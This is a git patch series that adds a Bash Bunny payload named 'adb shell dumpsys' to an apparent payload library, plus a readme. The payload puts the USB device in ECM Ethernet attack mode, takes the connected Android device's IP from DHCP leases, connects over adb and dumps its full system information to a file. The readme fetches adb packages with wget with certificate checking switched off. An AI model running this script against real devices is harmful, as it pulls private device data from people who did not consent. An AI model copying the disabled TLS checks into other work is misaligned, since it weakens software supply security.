From 92e37f98f88fe382b15043ed880a6fbebd1ced34 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:09:01 -0700 Subject: [PATCH 1/5] adb shell dumpsys --- .../library/adb_shell_dumpsys/payload.txt | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/adb_shell_dumpsys/payload.txt b/payloads/library/adb_shell_dumpsys/payload.txt new file mode 100644 index 000000000..f39ebf78b --- /dev/null +++ b/payloads/library/adb_shell_dumpsys/payload.txt @@ -0,0 +1,30 @@ +# Set the Bash Bunny to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Wait for 5 seconds to ensure the network interface is ready +sleep 5 + +# Extract the IP address of the connected device from DHCP leases +TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + +# Save the obtained IP address to a log file +cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt + +# Connect to the device using ADB over TCP/IP and save the output to a log file +adb connect ${TARGET_IP} +adb connect ${TARGET_IP} > /root/logs.txt + +# Wait for 20 seconds (optional) +sleep 20 + +# Dump system information from the device and save it to a file +adb shell dumpsys > /root/dumpsys.txt + +# Wait for 10 seconds (optional) +sleep 10 + +# Set the Bash Bunny back to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Indicate that the payload has finished executing +LED FINISH \ No newline at end of file From c757f1d274fda6778986dd6bbfb553b3a254c271 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:23:53 -0700 Subject: [PATCH 2/5] adb shell dumpsys --- .../android/adb_shell_dumpsys/payload.txt | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/mobile/android/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt new file mode 100644 index 000000000..f39ebf78b --- /dev/null +++ b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt @@ -0,0 +1,30 @@ +# Set the Bash Bunny to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Wait for 5 seconds to ensure the network interface is ready +sleep 5 + +# Extract the IP address of the connected device from DHCP leases +TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + +# Save the obtained IP address to a log file +cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt + +# Connect to the device using ADB over TCP/IP and save the output to a log file +adb connect ${TARGET_IP} +adb connect ${TARGET_IP} > /root/logs.txt + +# Wait for 20 seconds (optional) +sleep 20 + +# Dump system information from the device and save it to a file +adb shell dumpsys > /root/dumpsys.txt + +# Wait for 10 seconds (optional) +sleep 10 + +# Set the Bash Bunny back to ECM Ethernet attack mode +ATTACKMODE ECM_ETHERNET + +# Indicate that the payload has finished executing +LED FINISH \ No newline at end of file From aa16c0f8221d84cee1143b38f1e1fdd3aafb6fa5 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:25:57 -0700 Subject: [PATCH 3/5] Delete payloads/library/adb_shell_dumpsys directory --- .../library/adb_shell_dumpsys/payload.txt | 30 ------------------- 1 file changed, 30 deletions(-) delete mode 100644 payloads/library/adb_shell_dumpsys/payload.txt diff --git a/payloads/library/adb_shell_dumpsys/payload.txt b/payloads/library/adb_shell_dumpsys/payload.txt deleted file mode 100644 index f39ebf78b..000000000 --- a/payloads/library/adb_shell_dumpsys/payload.txt +++ /dev/null @@ -1,30 +0,0 @@ -# Set the Bash Bunny to ECM Ethernet attack mode -ATTACKMODE ECM_ETHERNET - -# Wait for 5 seconds to ensure the network interface is ready -sleep 5 - -# Extract the IP address of the connected device from DHCP leases -TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - -# Save the obtained IP address to a log file -cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt - -# Connect to the device using ADB over TCP/IP and save the output to a log file -adb connect ${TARGET_IP} -adb connect ${TARGET_IP} > /root/logs.txt - -# Wait for 20 seconds (optional) -sleep 20 - -# Dump system information from the device and save it to a file -adb shell dumpsys > /root/dumpsys.txt - -# Wait for 10 seconds (optional) -sleep 10 - -# Set the Bash Bunny back to ECM Ethernet attack mode -ATTACKMODE ECM_ETHERNET - -# Indicate that the payload has finished executing -LED FINISH \ No newline at end of file From 15cc8b08bfb691d8aa33bb90362922070e49782a Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:36:05 -0700 Subject: [PATCH 4/5] Update payload.txt --- .../android/adb_shell_dumpsys/payload.txt | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt index f39ebf78b..673f2c1a2 100644 --- a/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt +++ b/payloads/library/mobile/android/adb_shell_dumpsys/payload.txt @@ -1,3 +1,19 @@ +# Title: adb shell dumpsys +# Author: D14b0l1c +# +# Description: +# Set the Bash Bunny to ECM Ethernet attack mode +# Extract the IP address of the connected device from DHCP leases +# Connect to the device using ADB over TCP/IP and save the output to a log file +# Dump system information from the device and save it to a file +# Indicate that the payload has finished executing +# +# LED States: +# - Purple: Running HID emulation, connecting to the Android device +# - Blue Blinking: Running the 'adb shell dumpsys' command +# - Red Blinking: Failed to connect to the Android device +# - Green: Finished + # Set the Bash Bunny to ECM Ethernet attack mode ATTACKMODE ECM_ETHERNET @@ -27,4 +43,4 @@ sleep 10 ATTACKMODE ECM_ETHERNET # Indicate that the payload has finished executing -LED FINISH \ No newline at end of file +LED FINISH From a072c2cf5930385586c0d5a9ac003c82e69e5e85 Mon Sep 17 00:00:00 2001 From: D14b0l1c <66981132+D14b0l1c@users.noreply.github.com> Date: Thu, 4 Apr 2024 14:38:22 -0700 Subject: [PATCH 5/5] Create readme.md --- .../android/adb_shell_dumpsys/readme.md | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/mobile/android/adb_shell_dumpsys/readme.md diff --git a/payloads/library/mobile/android/adb_shell_dumpsys/readme.md b/payloads/library/mobile/android/adb_shell_dumpsys/readme.md new file mode 100644 index 000000000..74495ad41 --- /dev/null +++ b/payloads/library/mobile/android/adb_shell_dumpsys/readme.md @@ -0,0 +1,35 @@ +## Requirements + +Before using this Bash Bunny payload, please ensure you meet the following requirements: + +- **Bash Bunny device**: This payload is designed to run on the Bash Bunny hardware platform. Make sure you have a Bash Bunny device available. +- **Installation of essential `adb` packages**: In order to enable `adb` functionality on the Bash Bunny, you need to install the following packages: + - `android-liblog` + - `android-libbase` + - `android-libcutils` + - `android-libadb` + - `adb` + +### Installing Essential `adb` Packages + +To install the required `adb` packages on your Bash Bunny, follow these steps: + +1. Connect your Bash Bunny to a computer. +2. Open a terminal window and navigate to the Bash Bunny storage directory. +3. Execute the following commands to download and install the essential `adb` packages: + +```bash +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-liblog_7.0.0+r33-1_armhf.deb +dpkg -i android-liblog_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libbase_7.0.0+r33-1_armhf.deb +dpkg -i android-libbase_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libcutils_7.0.0+r33-1_armhf.deb +dpkg -i android-libcutils_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libadb_7.0.0+r33-1_armhf.deb +dpkg -i android-libadb_7.0.0+r33-1_armhf.deb + +wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/adb_7.0.0+r33-1_armhf.deb +dpkg -i adb_7.0.0+r33-1_armhf.deb